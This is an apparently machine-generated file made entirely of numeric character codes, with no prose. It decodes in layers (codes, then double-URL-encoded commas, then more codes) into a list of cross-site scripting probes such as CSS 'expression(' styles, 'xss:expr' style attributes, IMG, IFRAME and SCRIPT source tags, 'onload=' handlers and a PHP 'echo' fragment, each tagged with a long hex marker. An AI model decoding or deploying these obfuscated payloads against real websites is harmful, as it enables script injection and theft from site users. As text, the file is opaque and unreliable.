7,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,51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7,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49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49,49,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,51,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54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2,55,37,50,53,50,67,51,50,37,50,53,50,67,52,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53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2,55,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,54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2,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,48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1,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48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2,55,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,51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4,48,37,50,53,50,67,54,51,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,52,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,49,37,50,53,50,67,54,51,37,50,53,50,67,54,50,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,51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4,48,37,50,53,50,67,54,51,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,52,48,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,52,49,37,50,53,50,67,54,51,37,50,53,50,67,54,50,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,51,37,50,53,50,67,54,57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3,55,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53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4,50,37,50,53,50,67,54,48,37,50,53,50,67,56,52,37,50,53,50,67,54,56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3,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48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1,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,57,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52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49,49,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,55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2,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,53,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,52,55,37,50,53,50,67,52,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,52,50,37,50,53,50,67,52,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,52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3,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,53,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,52,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,49,50,51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49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,53,57,37,50,53,50,67,49,50,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,54,53,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,54,37,50,53,50,67,54,53,37,50,53,50,67,56,51,37,50,53,50,67,56,51,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,